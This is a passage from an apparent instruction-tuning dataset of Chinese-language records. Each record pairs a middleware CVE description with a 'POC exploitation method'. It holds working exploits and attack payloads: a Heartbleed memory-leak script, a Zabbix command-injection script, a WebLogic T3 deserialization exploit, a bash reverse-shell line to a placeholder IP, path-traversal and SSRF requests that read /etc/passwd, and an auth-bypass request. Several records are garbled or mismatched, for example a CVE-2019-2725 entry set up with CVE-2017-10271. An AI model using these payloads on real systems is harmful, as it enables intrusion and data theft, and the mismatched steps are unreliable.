h2bin('''\n16 03 02 00 dc 01 00 00 d8 03 02 53\n43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf\nbd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00\n00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88\n00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c\nc0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09\nc0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44\nc0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c\nc0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11\n00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04\n03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19\n00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08\n00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13\n00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00\n00 0f 00 01 01\n''')\n\nhb = h2bin('''\n18 03 02 00 03\n01 40 00\n''')\n\ndef hexdump(s: bytes):\n    for b in range(0, len(s), 16):\n        lin = [c for c in s[b : b + 16]]\n        hxdat = ' '.join('%02X' % c for c in lin)\n        pdat = ''.join((chr(c) if 32 <= c <= 126 else '.' )for c in lin)\n        print('  %04x: %-48s %s' % (b, hxdat, pdat))\n\n    print(\"\")\n\ndef recvall(s, length, timeout=5):\n    endtime = time.time() + timeout\n    rdata = b''\n    remain = length\n    while remain > 0:\n        rtime = endtime - time.time()\n        if rtime < 0:\n            return None\n        r, w, e = select.select([s], [], [], 5)\n        if s in r:\n            data = s.recv(remain)\n            # EOF?\n            if not data:\n                return None\n            rdata += data\n            remain -= len(data)\n    return rdata\n\n\ndef recvmsg(s):\n    hdr = recvall(s, 5)\n    if hdr is None:\n        print('Unexpected EOF receiving record header - server closed connection')\n        return None, None, None\n    typ, ver, ln = struct.unpack('>BHH', hdr)\n    pay = recvall(s, ln, 10)\n    if pay is None:\n        print('Unexpected EOF receiving record payload - server closed connection')\n        return None, None, None\n    print(' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay)))\n    return typ, ver, pay\n\ndef hit_hb(s):\n    s.send(hb)\n    while True:\n        typ, ver, pay = recvmsg(s)\n        if typ is None:\n            print('No heartbeat response received, server likely not vulnerable')\n            return False\n\n        if typ == 24:\n            print('Received heartbeat response:')\n            hexdump(pay)\n            if len(pay) > 3:\n                print('WARNING: server returned more data than it should - server is vulnerable!')\n            else:\n                print('Server processed malformed heartbeat, but did not return any extra data.')\n            return True\n\n        if typ == 21:\n            print('Received alert:')\n            hexdump(pay)\n            print('Server returned error, likely not vulnerable')\n            return False\n\ndef main():\n    opts, args = options.parse_args()\n    if len(args) < 1:\n        options.print_help()\n        return\n\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    print('Connecting...')\n    sys.stdout.flush()\n    s.connect((args[0], opts.port))\n    print('Sending Client Hello...')\n    sys.stdout.flush()\n    s.send(hello)\n    print('Waiting for Server Hello...')\n    sys.stdout.flush()\n    while True:\n        typ, ver, pay = recvmsg(s)\n        if typ == None:\n            print('Server closed connection without sending Server Hello.')\n            return\n        # Look for server hello done message.\n        if typ == 22 and pay[0] == 0x0E:\n            break\n\n    print('Sending heartbeat request...')\n    sys.stdout.flush()\n    s.send(hb)\n    hit_hb(s)\n\nif __name__ == '__main__':\n    main()\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/OpenSSL 心脏出血漏洞 CVE-2014-0160.md"}
    257. 

  257. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Zabbix Server trapper命令注入漏洞 CVE-2017-2824\n漏洞描述:Zabbix 是由Alexei Vladishev 开发的一种网络监视、管理系统,基于 Server-Client 架构。其Server端 trapper command 功能存在一处代码执行漏洞,特定的数据包可造成命令注入,进而远程执行代码。攻击者可以从一个Zabbix proxy发起请求,从而触发漏洞。 参考链接: - https://talosintelligence.com/reports/TALOS-2017-0325\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2017-2824\n【POC利用方法】\n1. docker-compose up -d\n2. import sys\nimport socket\nimport json\nimport sys\n\n\ndef send(ip, data):\n    conn = socket.create_connection((ip, 10051), 10)\n    conn.send(json.dumps(data).encode())\n    data = conn.recv(2048)\n    conn.close()\n    return data\n\n\ntarget = sys.argv[1]\nprint(send(target, {\"request\":\"active checks\",\"host\":\"vulhub\",\"ip\":\";touch /tmp/awesome_poc\"}))\nfor i in range(10000, 10500):\n    data = send(target, {\"request\":\"command\",\"scriptid\":1,\"hostid\":str(i)})\n    if data and b'failed' not in data:\n        print('hostid: %d' % i)\n        print(data)\n3. 利用该漏洞,需要你服务端开启了自动注册功能,所以我们先以管理员的身份开启自动注册功能。访问`http://your-ip:8080/index.php`,使用账号密码`admin/zabbix`登录后台,进入Configuration->Actions,将Event source调整为Auto registration,然后点击Create action,创建一个Action,名字随意:\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Zabbix Server trapper命令注入漏洞 CVE-2017-2824.md"}
    258. 

  258. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr Velocity 注入远程命令执行漏洞  CVE-2019-17558\n漏洞描述:Apache Solr 是一个开源的搜索服务器。 在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。 具体漏洞原理和POC可以参考: - https://nvd.nist.gov/vuln/detail/CVE-2019-17558 - https://issues.apache.org/jira/browse/SOLR-13971 - https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133 - https://github.com/jas502n/solr_rce\n影响版本:``` Apache Solr 5.x 至 8.2.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2019-17558\n【POC利用方法】\n1. Apache Solr 5.x 至 8.2.0\n2. docker-compose up -d\n3. http://your-ip:8983/solr/admin/cores?indexInfo=false&wt=json\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Solr Velocity 注入远程命令执行漏洞 CVE-2019-17558.md"}
    259. 

  259. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:OpenSSH 命令注入漏洞 CVE-2020-15778\n漏洞描述:2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。深信服安全研究团队依据漏洞重要性和影响力进行评估,作出漏洞通告。\n影响版本:``` OpenSSH <= 8.3p1 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-15778\n【POC利用方法】\n1. OpenSSH <= 8.3p1\n2. /bin/bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/9999 0>&1\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/OpenSSH 命令注入漏洞 CVE-2020-15778.md"}
    260. 

  260. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jetty 通用 Servlets 组件 ConcatServlet 信息泄露漏洞 CVE-2021-28169\n漏洞描述:Eclipse Jetty是一个开源的servlet容器,它为基于Java的Web容器提供运行环境,而Jetty Servlets是Jetty提供给开发者的一些通用组件。 在9.4.40, 10.0.2, 11.0.2版本前,Jetty Servlets中的`ConcatServlet`、`WelcomeFilter`类存在多重解码问题,如果开发者主动使用了这两个类,攻击者可以利用其访问WEB-INF目录下的敏感文件,造成配置文件及代码泄露。 参考链接: - https://github.com/eclipse/jetty.project/security/advisories/GHSA-gwcr-j4wh-j3cq\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-28169\n【POC利用方法】\n1. docker-compose up -d\n2. <link rel=\"stylesheet\" href=\"/static?/css/base.css&/css/app.css\">\n3. curl -v 'http://your-ip:8080/static?/%2557EB-INF/web.xml'\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Jetty 通用 Servlets 组件 ConcatServlet 信息泄露漏洞 CVE-2021-28169.md"}
    261. 

  261. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Mod_jk 访问控制权限绕过 CVE-2018-11759\n漏洞描述:Apache Tomcat JK(mod_jk)Connector是美国阿帕奇(Apache)软件基金会的一款为Apache或IIS提供连接后台Tomcat的模块,用以为Apache或IIS服务器提供处理JSP/Servlet的能力。 由于httpd和Tomcat在路径处理规范上存在差异,因此可以绕过Apache mod_jk Connector 1.2.0版本到1.2.44版本上由JkMount httpd指令所定义端点的访问控制限制。 如果一个只有只读权限的jkstatus的接口可以访问的话,那么就有可能能够公开由mod_jk模块给AJP提供服务的内部路由。 如果一个具有读写权限的jkstatus接口可供访问,我们就能通过修改AJP的配置文件中相关配置来劫持或者截断所有经过mod_jk的流量,又或者进行内部的端口扫描。\n影响版本:``` Apache Mod_jk Connector 1.2.0 ~ 1.2.44 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2018-11759\n【POC利用方法】\n1. Apache Mod_jk Connector 1.2.0 ~ 1.2.44\n2. git clone https://github.com/immunIT/CVE-2018-11759.git\ndocker-conpose up -d\n3. Forbidden\nYou don't have permission to access /jkstatus on this server.\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Mod_jk 访问控制权限绕过 CVE-2018-11759.md"}
    262. 

  262. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware View Planner 未授权RCE CVE-2021-21978\n漏洞描述:输入验证不正确以及缺少授权会导致在logupload Web应用程序中上传任意文件。具有对View Planner Harness的网络访问权限未经授权的攻击者可以上传并执行特制文件,从而导致在logupload容器中远程执行代码。 参考链接: - https://www.vmware.com/security/advisories/VMSA-2021-0003.html\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-21978\n【POC利用方法】\n1. POST /logupload?logMetaData={\"itrLogPath\":\"../../../../../../etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\",\"workloadID\":\"2\"}\n\nAccept-Encoding:gzip,deflate\nContent-Type:multipart/form-data;boundary=---WebKitFormBoundaryH8GoragzRFVTw1VD\n\n\n------WebKitFormBoundaryH8GoragzRFVTw1VD\nContent-Disposition:form-data;name=\"logfile\";filename=\"\"\nContent-Type:text/plain\n\n#! /usr/bin/env python3\nimport cgi\nimport os,sys\nimport logging\nimport jsom\n\n....\n2. POST /logupload?logMetaData={\"itrLogPath\":\"../../../../../../etc/httpd/html/wsgi_log_upload\",\"logFileType\":\"log_upload_wsgi.py\",\"workloadID\":\"2\"}\n3. Accept-Encoding:gzip,deflate\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/VMware View Planner 未授权RCE CVE-2021-21978.md"}
    263. 

  263. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Weblogic XMLDecoder 反序列化远程代码执行漏洞 CVE-2019-2725\n漏洞描述:由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,利用该漏洞获取服务器权限,实现远程代码执行。 参考链接: - https://github.com/TopScrew/CVE-2019-2725\n影响版本:``` Weblogic 10.3.6 Weblogic 12.1.3 ``` 影响组件: ``` bea_wls9_async_response.war wsat.war ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2019-2725\n【POC利用方法】\n1. Weblogic 10.3.6\nWeblogic 12.1.3\n2. bea_wls9_async_response.war\nwsat.war\n3. git clone https://github.com/vulhub/vulhub.git\ncd vulhub/weblogic/CVE-2017-10271\ndocker-compose up -d\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Weblogic XMLDecoder 反序列化远程代码执行漏洞 CVE-2019-2725.md"}
    264. 

  264. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:uWSGI PHP目录穿越漏洞 CVE-2018-7490\n漏洞描述:uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言。 uWSGI 2.0.17之前的PHP插件,没有正确的处理`DOCUMENT_ROOT`检测,导致用户可以通过`..%2f`来跨越目录,读取或运行`DOCUMENT_ROOT`目录以外的文件。\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2018-7490\n【POC利用方法】\n1. docker-compose up -d\n2. uWSGI 2.0.17之前的PHP插件,没有正确的处理`DOCUMENT_ROOT`检测,导致用户可以通过`..%2f`来跨越目录,读取或运行`DOCUMENT_ROOT`目录以外的文件。\n3. 访问`http://your-ip:8080/..%2f..%2f..%2f..%2f..%2fetc/passwd`,成功读取文件:\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/uWSGI PHP目录穿越漏洞 CVE-2018-7490.md"}
    265. 

  265. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:AppWeb认证绕过漏洞 CVE-2018-8715\n漏洞描述:AppWeb是Embedthis Software LLC公司负责开发维护的一个基于GPL开源协议的嵌入式Web Server。他使用C/C++来编写,能够运行在几乎先进所有流行的操作系统上。当然他最主要的应用场景还是为嵌入式设备提供Web Application容器。 AppWeb可以进行认证配置,其认证方式包括以下三种: - basic 传统HTTP基础认证 - digest 改进版HTTP基础认证,认证成功后将使用Cookie来保存状态,而不用再传递Authorization头 - form 表单认证 其7.0.3之前的版本中,对于digest和form两种认证方式,如果用户传入的密码为`null`(也就是没有传递密码参数),appweb将因为一个逻辑错误导致直接认证成功,并返回session。 参考链接: - https://ssd-disclosure.com/index.php/archives/3676\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2018-8715\n【POC利用方法】\n1. docker-compose up -d\n2. GET / HTTP/1.1\nHost: 192.168.174.128:8080\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\nConnection: close\nAuthorization: Digest username=admin\n3. - https://ssd-disclosure.com/index.php/archives/3676\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/AppWeb认证绕过漏洞 CVE-2018-8715.md"}
    266. 

  266. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938\n漏洞描述:Java 是目前 Web 开发中最主流的编程语言,而 Tomcat 是当前最流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。 [Ghostcat(幽灵猫)](https://www.chaitin.cn/zh/ghostcat) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。 参考链接: - https://www.chaitin.cn/zh/ghostcat - https://www.cnvd.org.cn/webinfo/show/5415 - https://mp.weixin.qq.com/s/D1hiKJpah3NhEBLwtTodsg - https://mp.weixin.qq.com/s/GzqLkwlIQi_i3AVIXn59FQ\n影响版本:``` Apache Tomcat 6 Apache Tomcat 7 < 7.0.100 Apache Tomcat 8 < 8.5.51 Apache Tomcat 9 < 9.0.31 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-1938\n【POC利用方法】\n1. Apache Tomcat 6\nApache Tomcat 7 < 7.0.100\nApache Tomcat 8 < 8.5.51\nApache Tomcat 9 < 9.0.31\n2. docker-compose up -d\n3. [root@VM-16-16-centos CVE-2020-1938]# docker exec -it fbe4 /bin/bash\nroot@fbe43a63b620:/usr/local/tomcat# cd webapps/ROOT/\nroot@fbe43a63b620:/usr/local/tomcat/webapps/ROOT# echo \"flag{Woooooooo}\" > flag.txt\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Tomcat AJP 文件包含漏洞 CVE-2020-1938.md"}
    267. 

  267. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache ActiveMQ 远程代码执行漏洞 CVE-2023-46604\n漏洞描述:Apache ActiveMQ 是 Apache 软件基金会研发的一个开源消息中间件,为应用程序提供高效的、可扩展的、稳定的和安全的企业级消息通信。 当未经身份认证的攻击者访问 Apache ActiveMQ 的 61616 端口时,可通过发送恶意数据在远程服务器上执行代码,进而控制 Apache ActiveMQ 服务器。 更新日期:2023-10-25 参考链接: - https://activemq.apache.org/activemq-5016006-release - https://github.com/Fw-fW-fw/activemq_Throwable\n影响版本:``` Apache ActiveMQ 5.18.0 < 5.18.3 Apache ActiveMQ 5.17.0 < 5.17.6 Apache ActiveMQ 5.16.0 < 5.16.7 Apache ActiveMQ < 5.15.16 Apache ActiveMQ Legacy OpenWire Module 5.18.0 < 5.18.3 Apache ActiveMQ Legacy OpenWire Module 5.17.0 < 5.17.6 Apache ActiveMQ Legacy OpenWire Module 5.16.0 < 5.16.7 Apache ActiveMQ Legacy OpenWire Module 5.8.0 < 5.15.16 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2023-46604\n【POC利用方法】\n1. Apache ActiveMQ 5.18.0 < 5.18.3\nApache ActiveMQ 5.17.0 < 5.17.6\nApache ActiveMQ 5.16.0 < 5.16.7\nApache ActiveMQ < 5.15.16\nApache ActiveMQ Legacy OpenWire Module 5.18.0 < 5.18.3\nApache ActiveMQ Legacy OpenWire Module 5.17.0 < 5.17.6\nApache ActiveMQ Legacy OpenWire Module 5.16.0 < 5.16.7\nApache ActiveMQ Legacy OpenWire Module 5.8.0 < 5.15.16\n2. ./activemq console\n3. python3 -m http.server 8080\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache ActiveMQ 远程代码执行漏洞 CVE-2023-46604.md"}
    268. 

  268. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Saltstack 未授权RCE漏洞 CVE-2021-25281~25283\n漏洞描述:SaltStack套件是政企机构 IT运维管理人员常用的管理工具,利用这些漏洞,最严重情形可导致未授权远程代码执行。 - CVE-2021-25281:salt-api wheel_async未授权访问 - CVE-2021-25283:sdb rest插件模版渲染问题 - CVE-2021-25282:wheel/pillar_roots.py文件任意写漏洞 ( 参考链接: - https://mp.weixin.qq.com/s/iu4cS_DZTs0sVVg92RBe4Q - https://mp.weixin.qq.com/s/QvQoTuQJVthxS07pbLWJmg - https://saltproject.io/security_announcements/active-saltstack-cve-release-2021-feb-25/ - https://dozer.nz/posts/saltapi-vulns - https://github.com/Immersive-Labs-Sec/CVE-2021-25281\n影响版本:``` Saltstack 3002.2之前的所有版本 SaltStack =< 3002.2 SaltStack =< 3001.4 SaltStack =< 3000.6 ```\n网络测绘:``` app=\"SALTSTACK-产品\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2021-25281\n【POC利用方法】\n1. Saltstack 3002.2之前的所有版本\nSaltStack =< 3002.2\nSaltStack =< 3001.4\nSaltStack =< 3000.6\n2. app=\"SALTSTACK-产品\"\n3. http://target/run\nPOST:\n\"client\": \"wheel_async\",\n\"fun\": \"pillar_roots.write\",\n\"data\": \"../../../../../tmp/test2\",\n\"path\": \"../../../../../tmp/test2\",\n\"username\": \"password\",\n\"password\": \"username\",\n\"eauth\": \"pam\"\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Saltstack 未授权RCE漏洞 CVE-2021-25281~25283.md"}
    269. 

  269. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr RCE 未授权上传漏洞 CVE-2020-13957\n漏洞描述:在特定的Solr版本中ConfigSet API存在未授权上传漏洞,攻击者利用漏洞可实现远程代码执行。\n影响版本:``` Apache Solr 6.6.0 -6.6.5 Apache Solr 7.0.0 -7.7.3 Apache Solr 8.0.0 -8.6.2 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2020-13957\n【POC利用方法】\n1. Apache Solr 6.6.0 -6.6.5\nApache Solr 7.0.0 -7.7.3\nApache Solr 8.0.0 -8.6.2\n2. cd solr-7.7.0\n./bin/solr start -e cloud -force\n3. Created collection 'gettingstarted' with 2 shard(s), 2 replica(s) with config-set 'gettingstarted'\n\nEnabling auto soft-commits with maxTime 3 secs using the Config API\n\nPOSTing request to Config API: http://localhost:8983/solr/gettingstarted/config\n{\"set-property\":{\"updateHandler.autoSoftCommit.maxTime\":\"3000\"}}\nSuccessfully set-property updateHandler.autoSoftCommit.maxTime to 3000\n\n\nSolrCloud example running, please visit: http://localhost:8983/solr\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Solr RCE 未授权上传漏洞 CVE-2020-13957.md"}
    270. 

  270. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Solr RemoteStreaming 文件读取与SSRF漏洞\n漏洞描述:Apache Solr 是一个开源的搜索服务器。在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或任意文件读取。 参考链接: - https://mp.weixin.qq.com/s/3WuWUGO61gM0dBpwqTfenQ\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. curl -i -s -k -X $'POST' \\\n    -H $'Content-Type: application/json' --data-binary $'{\\\"set-property\\\":{\\\"requestDispatcher.requestParsers.enableRemoteStreaming\\\":true}}' \\\n    $'http://your-ip:8983/solr/demo/config'\n3. curl -i -s -k 'http://your-ip:8983/solr/demo/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd'\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Apache Solr RemoteStreaming 文件读取与SSRF漏洞.md"}
    271. 

  271. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Ruby On Rails 路径穿越与任意文件读取漏洞CVE-2019-5418\n漏洞描述:在控制器中通过`render file`形式来渲染应用之外的视图,且会根据用户传入的Accept头来确定文件具体位置。我们通过传入`Accept: ../../../../../../../../etc/passwd{{`头来构成构造路径穿越漏洞,读取任意文件。 参考链接: - https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q - https://xz.aliyun.com/t/4448\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2019-5418\n【POC利用方法】\n1. docker-compose build\ndocker-compose up -d\n2. GET /robots HTTP/1.1\nHost: your-ip:3000\nAccept-Encoding: gzip, deflate\nAccept: ../../../../../../../../etc/passwd{{\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\n3. - https://groups.google.com/forum/#!topic/rubyonrails-security/pFRKI96Sm8Q\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Ruby On Rails 路径穿越与任意文件读取漏洞 CVE-2019-5418.md"}
    272. 

  272. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jenkins script 未授权远程命令执行漏洞\n漏洞描述:Jenkins 登录后访问 /script 页面,其中存在命令执行漏洞,当存在未授权的情况时导致服务器被入侵\n影响版本:``` Jenkins ```\n网络测绘:``` app=\"Jenkins\" ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【POC利用方法】\n1. app=\"Jenkins\"\n2. Linux: /var/lib/jenkins/secrets/initialAdminPassword\nWindows: C:\\Users\\RabbitMask\\.jenkins\\secrets\\initialAdminPassword\n3. http://xxx.xxx.xxx.xxx/script\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Jenkins script 未授权远程命令执行漏洞.md"}
    273. 

  273. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nginx 文件名逻辑漏洞 CVE-2013-4547\n漏洞描述:参考链接: - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4547 - https://blog.werner.wiki/file-resolution-vulnerability-nginx/ - http://www.91ri.org/9064.html\n影响版本:``` Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2013-4547\n【POC利用方法】\n1. Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7\n2. location ~ \\.php$ {\n    include        fastcgi_params;\n\n    fastcgi_pass   127.0.0.1:9000;\n    fastcgi_index  index.php;\n    fastcgi_param  SCRIPT_FILENAME  /var/www/html$fastcgi_script_name;\n    fastcgi_param  DOCUMENT_ROOT /var/www/html;\n}\n3. location /admin/ {\n    allow 127.0.0.1;\n    deny all;\n}\n", "category": "poc_middleware_vulnerability", "source": "awesome_poc_dataset", "file_path": "中间件漏洞/Nginx 文件名逻辑漏洞 CVE-2013-4547.md"}
    274. 

  274. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:WebLogic T3 反序列化漏洞 CVE-2016-3510\n漏洞描述:CVE-2016-3510漏洞是对CVE-2015-4852漏洞修复的绕过,攻击者在可以通过该漏洞实现远程命令执行。\n影响版本:``` Oracle WebLogic Server 12.2.1.0 Oracle WebLogic Server 12.1.3.0 Oracle WebLogic Server 12.1.2.0 Oracle WebLogic Server 10.3.6.0 ```\n", "input": "", "output": "【漏洞类型】middleware_vulnerability\n【CVE编号】CVE-2016-3510\n【POC利用方法】\n1. Oracle WebLogic Server 12.2.1.0\nOracle WebLogic Server 12.1.3.0\nOracle WebLogic Server 12.1.2.0\nOracle WebLogic Server 10.3.6.0\n2. #!/usr/bin/env python2\n\n#Oracle WebLogic Server Java Object Deserialization RCE (CVE-2016-3510)\n#Based on the PoC by FoxGlove Security (https://github.com/foxglovesec/JavaUnserializeExploits)\n#Made with <3 by @byt3bl33d3r\n\nfrom __future__ import print_function\nimport socket\nimport struct\nimport argparse\nimport os\nimport sys\nfrom subprocess import check_output\n\nysoserial_default_paths = ['./ysoserial.jar', '../ysoserial.jar']\nysoserial_path = None\n\nparser = argparse.ArgumentParser()\nparser.add_argument('target', type=str, help='Target IP:PORT')\nparser.add_argument('command', type=str, help='Command to run on target')\nparser.add_argument('--ysoserial-path', metavar='PATH', type=str, help='Path to ysoserial JAR (default: tries current and previous directory)')\n\nif len(sys.argv) < 2:\n    parser.print_help()\n    sys.exit(1)\n\nargs = parser.parse_args()\n\nif not args.ysoserial_path:\n    for path in ysoserial_default_paths:\n        if os.path.exists(path):\n            ysoserial_path = path\nelse:\n    if os.path.exists(args.ysoserial_path):\n        ysoserial_path = args.ysoserial_path\n\nif len(args.target.split(':')) != 2:\n    print('[-] Target must be in format IP:PORT')\n    sys.exit(1)\n\nif not args.command:\n    print('[-] You must specify a command to run')\n    sys.exit(1)\n\nip, port = args.target.split(':')\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\nprint('[*] Target IP: {}'.format(ip))\nprint('[*] Target PORT: {}'.format(port))\n\nsock.connect((ip, int(port)))\n\n# Send headers\nheaders='t3 12.2.1\\nAS:255\\nHL:19\\nMS:10000000\\nPU:t3://us-l-breens:7001\\n\\n'\nprint('[*] Sending header')\nsock.sendall(headers)\n\ndata = sock.recv(1024)\nprint('[*] Received: \"{}\"'.format(data))\n\npayloadObj = check_output(['java', '-jar', ysoserial_path, 'CommonsCollections1', args.command])\n\npayload = 